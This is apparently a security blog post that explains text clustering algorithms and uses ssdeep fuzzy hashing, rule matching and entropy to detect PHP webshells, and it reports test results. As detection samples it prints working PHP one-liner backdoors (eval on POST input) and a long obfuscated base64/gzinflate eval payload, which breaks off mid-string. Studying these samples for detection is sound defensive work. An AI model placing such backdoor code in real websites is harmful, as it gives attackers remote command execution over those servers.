Text Clustering、Malformation Webshell Detection
catalog
1. Text Clustering 2. Clustering Algorithm 3. Text Clustering Procedure 4. Text Clustering Programing 5. Malformation Webshell Detection 6. 多分类webshell聚类过程 7. DEMO原型效果测试 8. 基于机器学习进行WEBSHELL识别 9. 基于文件元信息进行可疑判断 10. 基于client+server粗细粒度的webshell检测 11. Syntax And Lexical Analysis In WEBSHELL Detection(基于词法、语法分析的WEBSHELL检测)
1. Text Clustering
文本聚类(Text clustering)文档聚类主要是依据著名的聚类假设
1. 同类的文档相似度较大 2. 不同类的文档相似度较小
聚类(分类)作为一种无监督的机器学习方法,聚类由于不需要训练过程,以及不需要预先对文档手工标注类别,因此具有一定的灵活性和较高的自动化处理能力,已经成为对文本信息进行有效地组织、摘要和导航的重要手段,聚类分析是按照一定的规律和要求对事物进行簇划分的过程,在这一过程中没有任何关于簇划分的先验知识,没有指导,仅靠事物间的相似性作为簇划分的准则,将一个数据集合划分成多个簇
1. 提供训练数据集(训练样本集) 2. 把人类的经验表示为特征(feature)(也即需要采样的维度),把数据集(样本)转换成特征向量(feature vector)(抽象后的数值),这个过程是一个建模的过程,将松散语义的文本抽象为一个格式化的数值向量 3. 利用这些数据集和他们的特征向量训练合适的分类器(Classifier),开源界广泛的聚类、机器学习工具算法就是在这一步存在较大的差别,不同的算法从本质上是看待特征向量和待检测样本的角度不同,但不管如何不同,最终的结果都是获得一个可量化的数值(或数组) 4. 评价分类效果,比如精度、召回率等等 5. 交叉检验分类效果 (Cross-validation)
机器学习并没有什么神秘的技术,它本质上是用多个变量进行综合决策,机器在这多个变量的约束下用数值计算方法找出近似最优解
0x1: 簇Cluster
分类的任务需要告诉机器他用来学习的正例(positive samples)和反例(negative samples),,正例和反例的涵盖范围和具体问题有关,在WEBSHELL检测中,正例就是正常网站文件,反例就是恶意的WEBSHELL文件
簇Cluster: 数据对象的集合
1. 在同一个簇中,数据对象是相似的 2. 不同簇之间的对象是不相似的
0x2: 数据集的划分
0x3: 聚类分析的数学描述
聚类分析 (Clustering)
给定数据样本集X: { X1, X2, …, Xn},根据数据点间的相似程度将数据集合分成K簇{C1, C2, …, Ck}的过程称为聚类分析 簇记为Ci == {Xj1i, Xj2i, …, Xjnii},Ci(i = 1, …, k)是X的子集,且满足 1) C1 ∪ C2 ∪ … ∪Ck = X 2) Ci ∩ Cj = ф,i≠j
相似样本在同一簇中,相异样本在不同簇中
0x3: 应用
1. 文档聚类可以作为多文档自动文摘等自然语言处理应用的预处理步骤,比较典型的例子是哥伦比亚大学开发的多文档文摘系统Newsblaster。Newsblaster将每天发生的重要新闻文本进行聚类处理,并对同主题文档进行冗余消除、信息融合、文本生成等处理,从而生成一篇简明扼要的摘要文档 2. 对搜索引擎返回的结果进行聚类,使用户迅速定位到所需要的信息。Hua-Jun Zeng等人提出了对搜索引擎返回的结果进行聚类的学习算法。比较典型的系统则有vivisimo和infonetware等系统允许用户输入检索关键词,而后对检索到的文档进行聚类处理,并输出各个不同类别的简要描述,从而可以缩小检索的范围,用户只需关注比较有希望的主题。另外这种方法也可以为用户二次检索提供线索 3. 对用户感兴趣的文档(如用户浏览器cache中的网页)聚类,从而发现用户的兴趣模式并用于信息过滤和信息主动推荐等服务 4. 聚类技术还可以用来改善文本分类的结果,如俄亥俄州立大学的Y.C. Fang, S. Parthasarathy和F. Schwartz等人的工作 5. 数字图书馆服务。通过SOM神经网络等方法,可以将高维空间的文档拓扑保序地映射到二维空间,使得聚类结果可视化和便于理解,如SOMlib[ ]系统 6. 文档集合的自动整理。如Scatter/Gather[ ]是一个基于聚类的文档浏览系统。而微软的Ji-Rong Wen等人则利用聚类技术对用户提出的查询记录进行聚类,并利用结果更新搜索引擎网站的FAQ
0x4: 文本聚类
1. Document Clustering (DC) is partitioning a set of documents into groups or clusters 2. Clusters should be computed to 1) Contain similar documents 2) Separate as much as possible different documents 3. For instance, if similarity between documents is defined to capture "semantic relatedness", documents in a cluster should deal with the same topics, and topics in each cluster should be different
Relevant Link:
http://baike.baidu.com/view/1133919.htm http://www.zhihu.com/question/21070175
2. Clustering Algorithm
0x1: 划分法(partitioning methods)
给定一个有N个元组或者纪录的数据集,分裂法将构造K个分组,每一个分组就代表一个聚类,K<N。而且这K个分组满足下列条件
1. 每一个分组至少包含一个数据纪录 2. 每一个数据纪录属于且仅属于一个分组(这个要求在某些模糊聚类算法中可以放宽) 3. 对于给定的K,算法首先给出一个初始的分组方法,以后通过反复迭代的方法改变分组,使得每一次改进之后的分组方案都较前一次好
将文档集D={d1,...,di , … ,dn}分割为的若干类具体过程
1. 确定要生成的类的数目K 2. 按照某种原则生成k个聚类中心作为聚类的种子: S={s1, … ,sj , … ,sk} 3. 对D中的每一个文档di ,依次计算它与各个种子sj的相似度: sim(di , sj) 4. 选取具有最大的相似度的种子: arg max sim(di , sj),将di归入以sj为聚类中心的类Cj,从而得到D的一个聚类: C={c1, … ,ck} 5. 重复步骤2~4若干次,以得到较为稳定的聚类结果
而所谓好的标准就是:同一分组中的记录越近越好,而不同分组中的纪录越远越好。使用这个基本思想的算法有
1. K-MEANS算法(K-均值) 1) 选择一个含有随机样本的k个簇的初始划分,计算这些簇的质心 2) 根据欧氏距离把剩余的每个样本分配到距离它最近的簇质心的一个划分 3) 计算被分配到每个簇的样本的均值向量,作为新的簇的质心(这个过程会逐渐产生近似于圆的收敛域) 4) 重复2、3步骤直到k个簇的质心点不再发生变化或准则函数收敛 2. K-MEDOIDS算法(k-中心点算法) 1) 不采用簇中样本的平均值作为参照点 2) 选用簇中位置最中心的对象―-中心点作为参照点 3. CLARANS算法 4. PAM(Partitioning Around Medoids围绕中心点划分) 1) 最早提出的k-中心点算法之一 2) 基本思想: 最初随机选择k个中心点后,反复尝试找更好的中心点 PAM算法流程 1) 随机选择k个代表对象作为初始的中心点 2) repeat 3) 指派每个剩余对象给离它最近的中心点所代表的簇 4) 随机的选择一个非中心点对象Orandom 5) 计算用Orandom代替Oj的总代价 6) 如果总代价为负,则Orandom代替Oj,形成新的k个中心点的集合 7) Until不发生变化
1. k-means算法示例
k-means的缺陷
1. 要求用户必须事先给出要生成的簇的数目,选择初始划分的最佳方向、更新和停止准则 2. 难以处理大小很不相同的簇或具有凹状的簇。 3. 算法只有在簇的平均值被定义的情况下才能使用,这不适涉及有分类属性的数据 4. 对噪音和异常点非常敏感 5. 方法速度快,但k要预先确定,种子选取难
2. PAM算法
0x2: 层次法(hierarchical methods)
这种方法对给定的数据集进行层次似的分解,直到某种条件满足为止。具体又可分为
1. 自底向上的聚类(凝聚): 1) 初始时每一个数据纪录都组成一个单独的组,在接下来的迭代中,它把那些相互邻近的组合并成一个组,直到所有的记录组成一个分组或者某个条件满足为止 2) 每一项自成一类 3) 迭代,将最近的两类合为一类 代表算法有 1) BIRCH算法 2) CURE算法 3) CHAMELEON算法等 2. 自顶向下的聚类(分裂) 1) 将所有项看作一类 2) 找出最不相似的项分裂出去成为两类
0x3: AGNES
1.单连接算法(single-linkage)(最近邻Nearest Neighbor) 1) 两个簇之间的距离用从两个簇中抽取的每对样本的最小距离作为距离度量 2) 一旦最近的两个簇的距离超过某个任意给定的阈值,算法就自动结束(即把簇之间尽量区分开来) 2.全连接算法 3.平均连接算法
0x4: 基于密度的方法(density-based methods)
基于密度的方法与其它方法的一个根本区别是
1. 基于样本之间的距离的聚类方法只能发现球状的簇,而基于密度的方法可用来过滤"噪声"孤立点数据,以发现任意形状的簇 2. 只要临近区域的密度(样本的数目)超过某个阈值则继续聚类。即对于给定簇中的每个样本,在一个给定范围的区域中必须至少包含某个数目的样本 3. 它不是基于各种各样的距离的,而是基于密度的。这样就能克服基于距离的算法只能发现"类圆形"的聚类的缺点 4. 这个方法的指导思想就是,只要一个区域中的点的密度大过某个阀值,就把它加到与之相近的聚类中去
基于密度聚类的相关定义
1. 给定对象半径ε内的区域称为该对象的"ε-邻域" 2. 如果一个对象的"ε-邻域"至少包含最小数目MinPts个对象,则称该对象为核对象 3. 给定一个对象集合D,如果p是在q的"ε-邻域"内,而q是一个核心对象,则称对象p从对象q出发是直接密度可达的 4. 如果存在一个对象链: 1) p1, p2, …, pn, p1 = q 2) pn = p,对pi∈D(1<=i<=n),pi+1是从pi关于ε和MinPts直接密度可达的,则对象p是从对象q关于ε和MinPts密度可达的 5.如果对象集合D中存在一个对象o,使得对象p和q是从o关于ε和MinPts密度可达的,那么对象p和q是关于ε和MinPts密度相连的
代表算法有
1. DBSCAN算法(Density-Based Spatial Clustering of Applications with Noise) 1) 任意选择没有加簇标签的点p 2) 找到p的"ε-邻域" 3) 如果"ε-邻域"的点个数 > MinPts,则p是核心对象,形成一个新的簇,给簇内所有的对象点加簇标签 4) 否则处理数据集的下一点 5) 重复上述过程,直到所有的点处理完毕 2. OPTICS算法(Ordering Points To Identify the Clustering Structure) 1) 对DBSCAN的改进 1.1) 对输入参数不敏感 1.2) 可以发现不同密度的簇 1.3) 用图表等可视化的方式来表示 1.4) 按可达距离排序 1.5) 可自动挖掘,也可与用户交互 2) 计算数据点p的核心距离和可达距离 3) 如果p为核心对象,找到所有它的关于和MinPts的直接密度可达点,按可达距离排序并插入队列 4) 处理下一个数据点 3. DENCLUE算法等
1. DBSCAN算法
DBSCAN算法的相关定义
1. 簇: 基于密度可达性的最大的密度相连对象的集合 2. 噪音: 不在任何簇中的对象 3. 边界对象: 不是核心对象,但在簇中即至少从一个核心对象直接可达
DBSCAN算法的不足和改进
1. 只能发现密度相仿的簇 2. 对用户定义的参数敏感 3. 计算复杂度为O(n2) 4. 采用R-树等空间索引技术,计算复杂度: o(nlogn)
2. OPTICS算法
0x4: 基于网格的方法(grid-based methods)
1. 数据空间区域被划分为矩形单元 2. 对应于不同级别的分辨率,存在着不同级别的矩形单元: 高层的每个单元被分为多个低一层的单元 3. 每个网格单元的统计信息被预先计算和存储,以供处理查询之用 4. 这种方法首先将数据空间划分成为有限个单元(cell)的网格结构,所有的处理都是以单个的单元为对象的 5. 这么处理的一个突出的优点就是处理速度很快,通常这是与目标数据库中记录的个数无关的,它只与把数据空间分为多少个单元有关
代表算法有
1. STING算法 2. CLIQUE算法(CLIQUE:Clustering In QUEst) 1) 将数据空间划分为互不相交的长方形单元,记录每个单元里的对象数 2) 用先验性质识别包含簇的子空间 3) 识别簇: 3.1) 在符合兴趣度的子空间中找出密集单元 3.2) 在符合兴趣度的子空间中找出相连的密集单元 4) 识别密集单元 4.1) 先验性质: 如果一个K维单元是密集的,那么它在k-1空间上的投影也是密集的 4.2) 即给定一个k维的侯选密集单元,如果检查它的k-1维投影空间,发现任何一个不是密集的,那么知道第k维的单元也不可能是密集的 3. WAVE-CLUSTER算法
1. CLIQUE算法
0x5: 基于模型的方法(model-based methods)
基于模型的方法给每一个聚类假定一个模型,然后去寻找一个能很好的满足这个模型的数据集。这样一个模型可能是数据点在空间中的密度分布函数或者其它。它的一个潜在的假定就是: 目标数据集是由一系列的概率分布所决定的。通常有两种尝试方向 1) 统计的方案(例如文本词频统计特性) 2) 神经网络的方案
0x6: 文档间距离
向量空间模型(Vector Space Model)
1. M个无序标引项ti(特征),词根/词/短语/其他 2. 每个文档dj可以用标引项向量来表示: (a1j,a2j,…,aMj) 3. 权重计算,N个训练文档: AM*N= (aij) 4. 相似度计算 1) Cosine计算 2) 内积计算
0x7: 簇间距离
簇Gp与簇Gq之间的距离Dpq
1. 最短距离法 2. 最长距离法 3. 重心法 4. 离差平方和 5. 簇平均法
0x8: Identifying almost identical files using context triggered piecewise hashing
Homologous files share identical sets of bits in the same order. Because such files are not completely identical, traditional techniques such as cryptographic hashing cannot be used to identify them.
1. Piecewise hashing
Originally developed by Nicholas Harbour for dcfldd (Harbour,2002), piecewise hashing uses an arbitrary hashing algorithm to create many checksums for a file instead of
just one. Rather than to generate a single hash for the entire file, a hash is generated for many discrete fixed-size segments of the file.
For example, one hash is generated for the first 512 bytes of input, another hash for the next 512 bytes, and so on.
2. The rolling hash
A rolling hash algorithm produces a pseudo-random value based only on the current context of the input. The rolling hash works by maintaining a state based solely on the last few bytes from the input. Each byte is added to the state as it is processed and removed from the state after a set number of other bytes have been processed.
3. Combining the hash algorithms
Whereas current piecewise hashing programs such as dcfldd used fixed offsets to determine when to start and stop the traditional hash algorithm, a CTPH algorithm uses the rolling hash. When the output of the rolling hash produces a specifi coutput, or trigger value, the traditional hash is triggered. That is, while processing the input file, one begins to compute the traditional hash for the file. Simultaneously, one must also compute the rolling hash for the file. When the rolling hash produces a trigger value, the value of the traditional hash is recorded in the CTPH signature and the traditional hash is reset.
Consequently, each recorded value in the CTPH signature depends only on part of the input, and changes to the input will result in only localized changes in the CTPH ignature.
For instance, if a byte of the input is changed, at most two,and in many cases, only one of the traditional hash values will be changed; the majority of the CTPH signature will remain the same. Because the majority of the signature remains the same, files with modifications can still be associated with the CTPH signatures of known files.
Relevant Link:
http://www.icst.pku.edu.cn/course/mining/12-13spring/TextMining05-%E8%81%9A%E7%B1%BB.pdf http://dfrws.org/2006/proceedings/12-Kornblum.pdf
3. Text Clustering Procedure
0x1: 文本聚类基本步骤
As other text processing tasks, DC has several steps
1. Document representation 2. Dimensionality reduction 3. Applying a clustering algorithm 4. Evaluating the effectiveness of the process
0x2: 聚类结果的评价
1. 准确率(P precision) 2. 召回率(R recall) 3. F-Measure 4. 所有类的总体评价 5. 宏平均 Macro 6. 微平均 Micro 7. 误差平方和准则(sum-of-squared-error criterion)
0x3: 聚类算法的评价
1. 该算法是否能发现某些或所有的隐含模式 2. 聚类算法要能产生高质量的聚类结果——簇,这些簇要具备以下两个特点: 1) 高的簇内相似性 2) 低的簇间相似性 3. 聚类结果的好坏取决于 1) 聚类算法采用的相似性评估方法 2) 该算法的具体实现 4. 可伸缩性 5. 能发现任意形状的簇 6. 参数输入的时候,尽量不需要特定的领域知识 7. 对输入数据对象的顺序不敏感 8. 能够处理噪声和异常 9. 能够处理不同类型的属性 10. 能处理高维数据 11. 能产生一个好的、满足用户指定约束的聚类结果 12. 结果是可解释的、可理解的和可用的
Relevant Link:
4. Text Clustering Programing
0x1: ssdeep
ssdeep is a program for computing context triggered piecewise hashes (CTPH). Also called fuzzy hashes, CTPH can match inputs that have homologies. Such inputs have sequences of identical bytes in the same order, although bytes in between these sequences may be different in both content and length.
Usage: ssdeep [-m file] [-k file] [-dpgvrsblcxa] [-t val] [-h|-V] [FILES] 1. -m: Match FILES against known hashes in file 2. -k: Match signatures in FILES against signatures in file 3. -d: Directory mode, compare all files in a directory 4. -p: Pretty matching mode. Similar to -d but includes all matches 5. -g: Cluster matches together 6. -v: Verbose mode. Displays filename as its being processed 7. -r: Recursive mode 8. -s: Silent mode; all errors are supressed 9. -b: Uses only the bare name of files; all path information omitted 10. -l: Uses relative paths for filenames 11. -c: Prints output in CSV format 12. -x: Compare FILES as signature files 13. -a: Display all matches, regardless of score 14. -t: Only displays matches above the given threshold 15. -h: Display this help message 16. -V: Display version number and exit
实验过程
type shell.php <?php .. eval($_POST['op']); ?> ssdeep.exe -b webshell_hash/shell.php > result_hashs.txt type result_hashs.txt ssdeep,1.1--blocksize:hash:hash,filename 96:KZVnaQSZyEhzFviSMEiSMiuDBd2633s8Us4qX9FGpTqXNFKCQZqX9FnTr1CoiyD:KZVaDZyEhzFXi26M8sbcDD,"shell.php" //检测自身和自身的相似度(结果必然为100) ssdeep.exe -bm result_hashs.txt webshell_hash/shell.php shell.php matches result_hashs.txt:shell.php (100) //对webshell进行修改 type shell1.php <?php .. eval($_POST['pwd']); //owned by LittleHann ?> ssdeep.exe -bm result_hashs.txt webshell_hash/shell1.php shell1.php matches result_hashs.txt:shell.php (99) //将已确认的新的webshell继续加入HASH特征库 ssdeep.exe -b webshell_hash/shell1.php >> result_hashs.txt //在新的HASH特征库的基础上循环迭代,继续检测其他的webshell type shell2.php <?php .. eval($_POST['e7xue']); //owned by hacker ?> ssdeep.exe -bm result_hashs.txt webshell_hash/shell2.php shell2.php matches result_hashs.txt:shell.php (99) shell2.php matches result_hashs.txt:shell1.php (99) //可以看到,待检测webshell和HASH库中的特征匹配度都很高
0x2: PHP ssdeep Fuzzy Hashing
ssdeep is a utility for creating and comparing fuzzy hashes or » context-triggered piecewise hashing.
Fuzzy hashing can match signatures which have "...sequences of identical bytes in the same order, although bytes in between these sequences may be different in both content and length
This extension provides functions for creating and comparing fuzzy hashes.
0x3: NeoPI
NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text/script files. The intended purpose of NeoPI is to aid in the detection of hidden web shell code. The development focus of NeoPI was creating a tool that could be used in conjunction with other established detection methods such as Linux Malware Detect or traditional signature/keyword based searches.
NeoPI recursively scans through the file system from a base directory and will rank files based on the results of a number of tests. It also presents a “general” score derived from file rankings within the individual tests.
Relevant Link:
http://ssdeep.sourceforge.net/ http://pecl.php.net/package/ssdeep http://danqingdani.blog.163.com/blog/static/1860941952014111291954550/ https://github.com/Neohapsis/NeoPI
5. Malformation Webshell Detection
我们知道,在入侵攻防中,WEBSHELL是一个主要的攻防载体,而基于文件创建、修改的实时通知机制的WEBSHELL检测是一个很关键的防御手段,但是在客户端的疑似WEBSHELL粗粒度检测需要面临几个难题
1. 管理员在服务器的备份、复制、解压操作可能会造成大量的文件变动 2. 网站的正常运行过程中会产生大量的临时、CACHE、上传、配置文件 3. 很多情况下,正常的WEB文件中会包含有一些疑似WEBSHELL、后门功能的代码,甚至很多时候,因为PHP语言的灵活性,一些WEBSHELL的特征和正常文件相差无几,例如PHP的动态函数执行机制 4. 黑客将WEBSHELL代码插入到了正常的网站文件中
0x1: 客户端疑似WEBSHELL粗粒度检测思路
采用组合逐步深入检测的思想
1. 上传待检测WEBSHELL 2. 基于已知MD5 HASH库的精确匹配: MD5 Hash库中的MD5被分为"YES WEBSHELL"、"NOT WEBSHELL"两种,用户精确化区分判断正常文件和WEBSHELL 1) MD5匹配结果为"YES WEBSHELL" 2) MD5匹配结果为"NOT WEBSHELL" 2. 采用基于字符串匹配权重分值的正则(每条字符串规则分配不同的权重分值,最后判断总和分值的方法)、正则匹配WEBSHELL检测 3. 采用PHP Toekn词法解析技术,对WEBSHELL进行预处理(例如Base64、ROT13反转加密),将密文预处理为明文 1) 将待检测文件解析为Token语法树序列结构 2) 递归地检测解密结点(例如base64_decode) 3) 对捕获到的解密结点之后的字符串进行对应的解密操作 4) 最后的结果是将含有加密操作(例如base64)的WEBSHELL解密为明文的PHP文件 4. 预处理(解密)结束后,进行完整的webshell正则、字符串权重分值判断逻辑,如果匹配成功,则结束判断,进入上报逻辑,如果匹配失败,则继续后续判断逻辑 5. 基于Token语法的危险函数变量回溯检测 1) 词法解析,获得PHP代码的所有Token 2) 根据Token获取到所有函数调用,并反向回溯函数调用中涉及的参数 3) 根据Token获取到所有变量赋值,即逆向回溯过程 4) 在变量逆向回溯到源头之后,进行关键字匹配,若是直接匹配到恶意,则认为恶意文件 5) 得知是恶意函数调用之后获取其参数,若是常量直接显示;若是变量再变量回溯 6. 针对webshell中可能出现的动态函数执行进行检测 1) 首先判断"(",然后括号左边的是变量或是identify就将其先保存下来 2) 然后再逐个进行匹配括号"("右边的参数,提取参数 3) 如果匹配出的是变量就进行变量回溯 4) 将回溯得到的值进行正则或是字符串匹配,最后回溯到底的这个值如果是webshell那一定是一个包含恶意特征的代码 7. 之前的判断逻辑全部判断失败后,进行最后一轮判断,根据聚类结果进行WEBSHELL判断,进行SSDEEP算法模糊匹配 1) 对外一个上传待检测webshell的接口 2) 检测完毕后,给出一个检测结果("YSE WEBSHELL" or "NOT WEBSHELL"),并标记为待确认状态(is_check = 0) 3) 由安全人员定期对待确认状态的WEBSHELL进行确认,已确认的新的WEBSHELL会提取特征到特征库中,包括 3.1) Md5: 标明is_webshell = 1 / 0: (用于确定性地表明是WEBSHELL or 不是WEBSHELL) 3.2) Ssdeep HASH: 标明is_webshell = 1 / 0: (用于进行) 4) 前期算法学习阶段使用大量的WEBSHELL样本进行自学习,用大量的WEBSHELL样本,然后利用ssdeep计算出hash签名作为标准特征库 5) 每次将待检测WEBSHELL和ssdeep HASH库进行逐一比较,得到两个结果数组,其中每个数组元素为待检测WEBSHELL和ssdeep Hash库中每个hash条目的fuzzy hash比较结果 5.1) Ssdeep_hash -> is_webshell = 1: "yes webshell"聚类结果 5.2) Ssdeep_hash -> is_webshell = 0: "not webshell"聚类结果 6) 分别统计两个结果数组中分值超过90分的个数,以个数的为最后结果,即取最后聚类结果更偏向的方向,即置信度
0x2: 基础数据库搭建
//创建数据库 CREATE DATABASE webshell_detection; //1. 创建数据表: webshell_scan id filename original_filename uploadtime is_check is_webshell //2. 创建数据表: md5_hash id md5_hash is_webshell //3. 创建数据表: ssdeep_hash id ssdeep_hash is_webshell
0x3: Code
http://files.cnblogs.com/files/LittleHann/ssdeep.zip
0x4: 聚类学习过程
改进后的意义在于
1. 替代原本的服务端审核webshell记录、提取特征、修改客户端规则的运营流程 2. 改为只在服务端review上报上来的疑似webshell,并进行人工确认 3. 提高客户端webshell的检出率、降低误报率
而ssdeep聚类算法的关键在于前期学习了大量的样本,即需要"喂食"大量的正常文件和WEBSHELL文件,使SSDEEP HASH库形成两簇较为集中的聚类中心
6. 多分类webshell聚类过程
0x1: 二值聚类存在的问题
传统的聚类算法辞去二值分类的思想,即只将样本数据分为两类,这种分类方法当遇到畸形样本的时候,很容易产生误报和漏报
1. 最初的样本中,webshell和正常网站文件都是特征和很明显,表现在模糊hash上就是样本间距离很大 2. 当向ssdeep引擎中加入"正常文件中插马"、"网站大马",这两种马的核心特点就是在模糊化后和正常网站文件的差别很小,可以想象为在一张聚类图中,原本是两堆距离很远的点集,因为这件事之后,两堆点集的中间也出现了一些零散的点 3. 训练结束之后,误报率反而开始提高了,很多正常网站文件开始被识别为webshell,而很多webshell又被识别为了正常文件
0x2: 改进的方向
1. 把现有的二分聚类,扩展成多类的聚类,针对webshell文本文件类型多的特点,可能分成4、5组,待测文件分别在每一类进行聚类,结束后进行投票,聚类为票数最多的那一类 1) 一句话webshell 2) 大马 3) DDOS木马 4) 正常网站文件中插入webshell木马 5) SEO网马 6) 正常网站文件 2. 使用精简化、准确度高的webshell规则,取消规则命中的打分机制,改为使用准确的正则规则判断,判断结果只有两种 1) yes_webshell 2) not_webshell 3. 基于K-紧邻算法思想优化ssdeep模糊化HASH聚类判定算法 1) 将待检测样本和"YSE_WEBSHELL"、"NOT_WEBSHELL"分别进行聚类判断 2) 计算每类聚类结果的"模糊化分值(本质上是一个数学距离)",结束后,分别求其算术平均值,得到待检测样本对于两类的相对距离
0x3: ssdeep需要改进的点
在使用ssdeep检测一句话WEBSHELL的时候,经常会报错
ssdeep: Did not process files large enough to produce meaningful results
这是因为ssdeep的分段模糊化HASH算法本质上是一种"分组运算算法",它对待检测文本的最小长度有硬性要求,如果待检测文本小于最小的"一块"则无法进行计算,一种可行的解决方案是对小于一块的待检测文本进行PADDING填充(类似MD5算法),然后进行计算
7. DEMO原型效果测试
0x1: 样本训练方法
样本的训练本质上是一个将样本集进行二分聚类的归类过程,这个过程需要人工参与
1. 正常文件聚类训练 1) Curl模拟提交正常样本文件 2) 自动化手工打标为正常文件 http://112.124.6.139/ssdeep/index.php?filename=7055c8aaaf4ef6e0a98ce6b37b654799&action=verify&type=3 2. 恶意WEBSHELL文件聚类训练 1) Curl模拟提交恶意WEBSHELL文件 2) 自动化手工打标为WEBSHELL http://112.124.6.139/ssdeep/index.php?filename=7055c8aaaf4ef6e0a98ce6b37b654799&action=verify&type=2
0x2: 正常网站文件训练样本集
1. wordpress 2. discuz 3. ecshop 4. dedecms 5. phpmyadmin 6. thinkphp framework //历史所有版本,总计7w个有效.PHP文件
Relevant Link:
http://blog.sina.com.cn/s/blog_78dfee090102vhth.html http://discuz.ml/download http://download.comsenz.com/DiscuzX/ http://www.dedecms.com/products/dedecms/downloads/ http://sourceforge.net/projects/phpmyadmin/files/phpMyAdmin/ https://code.google.com/p/thinkphp/downloads/list
0x3: 恶意WEBSHELL文件训练样本集
1. github webshell样本库 2. 日常中收集的webshell //总计1500+
Relevant Link:
https://github.com/tennc/webshell https://github.com/JohnTroony/php-webshells
0x4: 检测效果报告
1. 样本库情况
1. 正常网站文件: 9190 2. 恶意WEBSHELL文件: 341
2. 测试文件
1. webshell文件: 64 2. 正常网站文件: 436
3. DEMO引擎自动化判断结果
//效果测试样本为不在前期训练范围内的脚本样本,即检测DEMO对待检测样本没有任何先验知识 1. WEBSHELL漏报率: WEBSHELL文件中,有几个被误判为正常文件,漏报率: 1 / 64 = 1.5625% SELECT * FROM `webshell_scan` WHERE `is_webshell` = 0 AND `is_check` = 0; 2. 正常文件误报率:正常文件有几个文件被误判为WEBSHELL,误报率: 0(误报数) / 436(总文件数) = 0% SELECT * FROM `webshell_scan` WHERE `is_webshell` = 1 AND `is_check` = 0;
8. 基于机器学习进行WEBSHELL识别
如果能把人类的经验用数量化表达给机器,机器就能学习到人类的经验,而特征(feature)就是人类经验的模型化,而根据特征进行的抽象计算是基于人类经验对待检测样本的数值化。特征工程是个反复循环的过程,一开始我们找到基线特征,用分类算法计算并评价结果,如果结果不能达到预期,再回头来加入新的特征帮助更好的分类
0x1: 随机性和熵
我们用Shannon熵表达待检测文本里各个字符出现的随机性,因为越是随机熵值越高,这种检测方法对加密型、混淆型WEBSHELL的检测效果较好,因为加密/BASE64处理后的WEBSHELL往往呈现随机字符的特性,例如下面的例子
3.php
<?php $pass2 = 'ec38fe2a8497e0a8d6d349b3533038cb'; $pass = 'd366d1753a59d6a078ca2ae087e99903'; eval(gzinflate(base64_decode('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